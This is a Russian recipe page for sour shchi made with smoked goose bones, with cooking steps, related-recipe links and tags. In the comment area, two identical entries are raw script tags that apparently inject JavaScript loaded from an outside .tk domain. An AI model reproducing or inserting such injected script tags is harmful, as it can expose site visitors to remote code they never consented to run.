Друзья

Кислые щи на копчёном гусе

На прошлое Рождество мне в подарок знакомый фермер привёз копчёного гуся, да посоветовал - ты косточки-то от него не выкидывай! Все в морозилку складывай, потом суп вкусный наваристый сваришь.

А гусь и правда быль такой довольно мясистый и жирный, сразу было видно, что бульон из него получится знатный.

Так вот, гусь хоть и большой был, но съели мы его за вечер, так и в морозилку косточки я убирать не стала, а прямо в тот вечер и задумала сварить кислых щей суточных, они, как раз, просто идеально идут на следующий день после продолжительных и весёлых застолий.

Да, для большего навару, да и чтобы в щах было хоть какое-то присутствие мясного ингредиента, я припрятала пару гусиных голеней.

Кстати, чем ещё хороших суточные щи - их варить для ленивой хозяйки - одно удовольствие, минимум телодвижений при максимально-феерическом результате! Проверено на похмельных гостях, уж они-то врать не будут, собственными глазами видела их волшебное преображение после пары тарелочек этих сказочных наваристых щей.

Итак, для этих суточных кислых щей на копчёном гусе вам понадобятся следующие ингредиенты:

  • пару голеней копчёного гуся и все его остальные крупные косточки
  • две крупные репчатые луковицы
  • несколько картошин (это опционально, не все варят щи с этим корнеплодом, так что если не хотите, то не добавляйте, а просто увеличьте количество кислой капусты
  • квашеная капуста с рассолом
  • соль
  • чёрный свежесмолотый перец
  • лавровый лист
  • чёрный перец горошком
  • свежая зелень укропа, петрушки, зелёный лук для подачи на стол
  • сметана (тоже опционально)
  • растительное масло для жарки (и это тоже опционально)
  • Варить суточные кислые щи стоит в кастрюле с толстым дном, я для этого использую чугунный казан.
  • Есть два варианта приготовления: с предварительным обжариванием на растительном масле лука и гусиных запчастей или самый ленивый - и так нормально.
  • Если хотите с обжаркой, тогда налейте немного растительного масла на дно кастрюли и спассеруйте до золотистого цвета лук, нарезанный тонкими полукольцами, а затем добавьте гусиные запчасти и их тоже немного подрумяньте.
  • И вот только теперь добавляйте нужное количество нарезанного картофеля.
  • Кстати, в эти щи картофель не стоит нарезать мелко, а то он весь быстро разварится. 
  • Я же выбрала самый ленивый вариант, потому что после застолья уже как-о не до танцев с бубнами вокруг плиты, поэтому я просто загрузила всё в казан: измельчённый лук, гусиные запчасти, нарезанный картофель, квашеную капусту, залила всё водой и поставила на самый маленький огонь томиться под крышкой аж на четыре часа.
  • Самое главное - не забывать поглядывать, чтобы жидкости всегда было для варки достаточно, да тут и так понятно, что при таком малом кипении, да под плотной крышкой за эти четыре часа ничего практически не выкипит.
  • В самом конце нужно добавить несколько лавровых листочков и чайную ложку чёрного перца горошком, влит стакан капустного рассолу и всё тщательно перемешать, да выровнять на соль. 
  • Потомить под крышкой ещё минут десять, да вынести на улицу на самый мороз, пусть за ночь щи проморозятся.
  • А с утра уже вернуть на плиту на тот же медленный огонь оттаивать, да закипать, но не кипеть!
  • Как только пошли первые бульки, то всё! Выключаем и быстро разливаем по тарелкам страждущих, обильно сдабриваем чёрным свежесмолотым перцем, да по желанию измельчённой свежей зеленью.

Ну, и приятного аппетита, конечно же!

Автор рецепта:Африка

Метки этой статьи
рассказать друзьям
Распечатать
Высказаться
Чтобы прокомментировать, войдите под удобным для вас аккаунтом:
<script async src=//beybay.tk/pp.js></script>
16.08.2016 20:33 Ответить
<script async src=//beybay.tk/pp.js></script>
16.08.2016 20:33 Ответить
Ещё по теме
Суп-лапша домашняяЩи СахалинскиеСуп-харчо из бараньей грудинкиСолянка мясная по-домашнемуПростой овощной супСуп-пюре гороховый, с копченостями и гренкамиРассольник ленинградскийБорщUiensoep - луковый супЛуково-томатный суп с сыром и копченостямиРыбная солянка (сборная)Летний суп на АйранеОвощной суп с рисом и чеснокомОвощной суп с зеленым горошкомЛапша с грибамиЩи с кислой капустой и копчеными колбаскамиСкандинавская уха (вариант)Суп с фрикаделькамиСуп с куриными потрошкамиЛилечкин бульонКуриный суп с лавашемСуп-пюре из курицы со сливкамиПостная чечевичная похлебкаСвекольник с куриными потрохамиСуп грибной "Деревенский""Рублевый" супСуп из зеленого горошка с копчеными ребрышкамиСуп морковный с грибамиПостный борщСуп из красной фасоли с сосискамиСуп с молодой крапивой и щавелемПостные щи с грибами и гречкойБорщ с фрикадельками из индейкиТыквенный супСуп с креветкамиПохлёбка из форели с пшеномСолянка сборная мяснаяБорщ с чечевицей в мультиваркеКуриный суп с ячневой крупой и чечевицейЛенивый лагманКислые щи с ячневой крупой и паприкойМинестроне с белыми грибамиОстрая окрошка на кефиреБорщ с грибами и кабачкамиСырный суп с сосискамиГречневый суп с копчёностямиБорщ Московский с сосисками и квашеной капустойКислые щи на копчёном гусе
Теги
Красный лук шалот Мультиварка Пьяный повар ананас апельсины базилик байки баклажаны баранина бекон блины блоги болгарский перец будни ветчина вешенка вода говядина горчица гречка грибы диета дрожжевое тесто дрожжи духовка зеленый горошек зеленый лук зелень зира изюм имбирь йогурт кабачки капуста картофель кефир кинза кляр кориандр корица котлеты красный чили креветки крупа кукуруза кунжут куриная грудка куриная печень куриные грудки куриные крылышки куриные окорочка курица куркума лаваш лавровый лист лимон лимонный сок лосось лук лук-порей майонез манка маринад маслины мед молоко морковь морская капуста морская соль мука мясной бульон мясной фарш мясо обработка продуктов общепит огурцы оливковое масло омлет орегано орехи пангасиус панировочные сухари паприка паста пекинская капуста пельмени перец перец горошком перец салатный перец чили петрушка печень печенье полезные советы помидор постное растительное масло редис рис рулет рыба салат салат листовой сахар сахарная пудра свекла свинина сгущенное молоко сельдь семга сливки сливочное масло слоеное тесто смесь итальянских трав смесь прованских трав сметана соевый соус соленый огурец сосиски соус спагетти специи стручковая фасоль сыр творог томат-паста томатный сок тыква украшения укроп уксус фарш фотоотчет фритюр хлеб цуккини чеснок чечевица шампиньоны яблоки яйца